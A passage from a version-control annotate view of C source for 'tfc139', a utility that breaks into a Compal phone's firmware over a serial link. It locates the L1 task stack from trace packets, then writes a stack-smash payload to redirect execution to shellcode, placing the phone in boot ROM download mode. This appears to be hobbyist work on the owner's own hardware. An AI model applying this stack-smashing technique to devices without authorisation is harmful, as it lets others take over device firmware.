Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
169 default: |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
170 usage: fprintf(stderr, |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
171 "usage: %s [options] ttyport\n", argv[0]); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
172 exit(1); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
173 } |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
174 if (argc - optind != 1) |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
175 goto usage; |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
176 if (stack_smash_addr && !shellcode_load_addr) { |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
177 fprintf(stderr, "usage error: -a option required with -s\n"); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
178 exit(1); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
179 } |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
180 open_target_serial(argv[optind]); |
418
a9bf3e92a30c
tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
361
diff
changeset
|
181 target_tty_port = argv[optind]; |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
182 |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
183 set_serial_nonblock(0); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
184 setlinebuf(stdout); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
185 if (logfname) { |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
186 logF = fopen(logfname, "w"); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
187 if (!logF) { |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
188 perror(logfname); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
189 exit(1); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
190 } |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
191 setlinebuf(logF); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
192 fprintf(logF, "*** Log of TFC139 break-in session ***\n"); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
193 } |
361
62f850da5d49
tfc139: log timestamp buglet
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
360
diff
changeset
|
194 time(&logtime); |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
195 if (stack_smash_addr) |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
196 initiate_breakin(); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
197 else |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
198 send_memcheck_query(); |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
199 for (;;) { |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
200 FD_ZERO(&fds); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
201 FD_SET(target_fd, &fds); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
202 c = select(target_fd+1, &fds, 0, 0, 0); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
203 time(&logtime); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
204 if (c < 0) { |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
205 if (errno == EINTR) |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
206 continue; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
207 perror("select"); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
208 exit(1); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
209 } |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
210 if (FD_ISSET(target_fd, &fds)) |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
211 process_serial_rx(); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
212 } |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
213 } |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
214 |
360
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
215 static void |
975
0d7cc054ef72
rvinterf/lowlevel: updates for the new knowledge of TM predating ETM
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
432
diff
changeset
|
216 handle_tm_response() |
360
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
217 { |
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
218 char msgbuf[80]; |
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
219 |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
220 if (!breakin_in_progress) { |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
221 output_line("TM response unexpected at this time"); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
222 return; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
223 } |
360
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
224 if (rxpkt_len != 4 || rxpkt[1] != 0x40 || rxpkt[2] || rxpkt[3] != 0x40){ |
975
0d7cc054ef72
rvinterf/lowlevel: updates for the new knowledge of TM predating ETM
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
432
diff
changeset
|
225 output_line("TM response differs from expected"); |
360
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
226 return; |
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
227 } |
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
228 sprintf(msgbuf, "Sending stack smash write at 0x%x", stack_smash_addr); |
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
229 output_line(msgbuf); |
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
230 send_compal_memwrite(stack_smash_addr, stack_smash_payload, 4); |
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
231 stack_smash_addr += 4; |
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
232 } |
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
233 |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
234 static void |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
235 analyze_gpf_packet() |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
236 { |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
237 unsigned stackbase, untouched; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
238 static char format[] = |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
239 "Name:L1 Stat:%*s Count:%*s Prio:%*s Stack:%x Size:%*s Untouched:%u"; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
240 char msgbuf[80]; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
241 |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
242 if (rxpkt_len < 17 || rxpkt_len > 128) |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
243 return; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
244 /* it needs to be a trace packet */ |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
245 if ((rxpkt[1] & 0xF0) != 0xA0) |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
246 return; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
247 /* check the length */ |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
248 if (rxpkt[2] + 4 != rxpkt_len) |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
249 return; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
250 if (rxpkt[3]) |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
251 return; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
252 /* skip timestamp, check src and dest */ |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
253 if (strncmp(rxpkt + 8, "SYSTPCO ", 8)) |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
254 return; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
255 /* terminating NUL for sscanf */ |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
256 rxpkt[rxpkt_len] = '\0'; |
985
8109185528c1
tfc139: new logic actually works
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
984
diff
changeset
|
257 if (sscanf(rxpkt + 16, format, &stackbase, &untouched) != 2) |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
258 return; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
259 /* success! */ |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
260 sprintf(msgbuf, |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
261 "Parsed L1 stack location: base=0x%x, untouched=%u (0x%x)", |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
262 stackbase, untouched, untouched); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
263 output_line(msgbuf); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
264 if (stackbase & 3) { |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
265 output_line("Error: stack base address is not word-aligned"); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
266 exit(1); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
267 } |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
268 untouched &= ~3; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
269 if (!shellcode_load_addr) { |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
270 if (untouched < sizeof shellcode) { |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
271 output_line("Error: not enough room for shellcode"); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
272 exit(1); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
273 } |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
274 shellcode_load_addr = stackbase; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
275 } |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
276 stack_smash_addr = stackbase + untouched; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
277 initiate_breakin(); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
278 } |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
279 |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
280 handle_rx_packet() |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
281 { |
360
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
282 if (rxpkt_len == 2 && rxpkt[0] == 'O' && rxpkt[1] == 'K') { |
418
a9bf3e92a30c
tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
361
diff
changeset
|
283 output_line( |
a9bf3e92a30c
tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
361
diff
changeset
|
284 "Success: target should now be in boot ROM download wait"); |
a9bf3e92a30c
tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
361
diff
changeset
|
285 printf("You can now run fc-loadtool -h compal -c none %s\n", |
a9bf3e92a30c
tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
361
diff
changeset
|
286 target_tty_port); |
a9bf3e92a30c
tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
361
diff
changeset
|
287 exit(0); |
360
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
288 } |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
289 switch (rxpkt[0]) { |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
290 case RVT_RV_HEADER: |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
291 if (rxpkt_len < 6) |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
292 goto unknown; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
293 print_rv_trace(); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
294 return; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
295 case RVT_L1_HEADER: |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
296 print_l1_trace(); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
297 return; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
298 case RVT_L23_HEADER: |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
299 print_g23_trace(); |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
300 if (!breakin_in_progress) |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
301 analyze_gpf_packet(); |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
302 return; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
303 case RVT_TM_HEADER: |
975
0d7cc054ef72
rvinterf/lowlevel: updates for the new knowledge of TM predating ETM
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
432
diff
changeset
|
304 print_tm_output_raw(); |
0d7cc054ef72
rvinterf/lowlevel: updates for the new knowledge of TM predating ETM
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
432
diff
changeset
|
305 handle_tm_response(); |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
306 return; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
307 default: |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
308 unknown: |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
309 print_unknown_packet(); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
310 } |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
311 } |